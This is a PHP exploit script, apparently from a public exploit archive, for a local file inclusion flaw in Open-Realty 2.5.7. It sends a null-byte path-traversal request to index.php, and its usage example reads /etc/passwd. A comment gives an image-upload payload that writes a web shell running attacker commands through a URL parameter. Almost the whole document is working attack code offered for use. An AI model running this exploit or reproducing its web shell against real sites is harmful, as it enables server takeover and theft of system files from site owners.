64 lines
No EOL
1.6 KiB
PHP
64 lines
No EOL
1.6 KiB
PHP
<?php
|
|
/*
|
|
* Exploit Title:
|
|
* Date: 2010-08-18
|
|
* Author: Nikola Petrov
|
|
* Vendor: http://open-realty.org/
|
|
* Version: 2.5.7
|
|
*/
|
|
/*
|
|
vulnerable: Open-Realty 2.5.7
|
|
LFI: /index.php
|
|
|
|
upload image with: <?php system("echo \"<?php if(isset(\$_GET[\"cmd\"])) system(\$_GET[\"cmd\"]); ?>\" > sh.php"); ?>
|
|
include the image and sh.php will be generated.
|
|
proceed with sh.php
|
|
|
|
MAGIC_QUOTES must be 'off' and %00 must not be replaced with \0.
|
|
*/
|
|
|
|
print "\n\n#########################################################################\n";
|
|
print "#LFI discovery and implementation: Nikola Petrov (vp.nikola@gmail.com)\n";
|
|
print "#Date: 05.09.2009\n";
|
|
print "#########################################################################\n\n";
|
|
|
|
if($argc < 5) {
|
|
print "usage: $argv[0] host port path file [debug: 1/0]\n";
|
|
print "example: $argv[0] localhost 80 / ../../../../../../../../../../../../etc/passwd\n\n\n";
|
|
exit();
|
|
}
|
|
|
|
$Host = $argv[1];
|
|
$Port = $argv[2];
|
|
$Path = $argv[3];
|
|
$File = $argv[4];
|
|
|
|
function HttpSend($aHost, $aPort, $aPacket) {
|
|
$Response = "";
|
|
|
|
if(!$Socket = fsockopen($aHost, $aPort)) {
|
|
print "Error connecting to $aHost:$aPort\n\n";
|
|
exit();
|
|
}
|
|
|
|
fputs($Socket, $aPacket);
|
|
|
|
while(!feof($Socket)) $Response .= fread($Socket, 1024);
|
|
|
|
fclose($Socket);
|
|
|
|
return $Response;
|
|
}
|
|
|
|
$VulnRequest = "select_users_lang=". $File . "%00";
|
|
|
|
$Packet = "POST {$Path} HTTP/1.1\r\n";
|
|
$Packet .= "Host: {$Host}\r\n";
|
|
$Packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
|
|
$Packet .= "Content-Length: " . strlen($VulnRequest) . "\r\n\r\n";
|
|
$Packet .= "$VulnRequest\n";
|
|
|
|
if($argv[5] == 1) print $Packet;
|
|
|
|
print HttpSend($Host, $Port, $Packet);
|
|
?>
|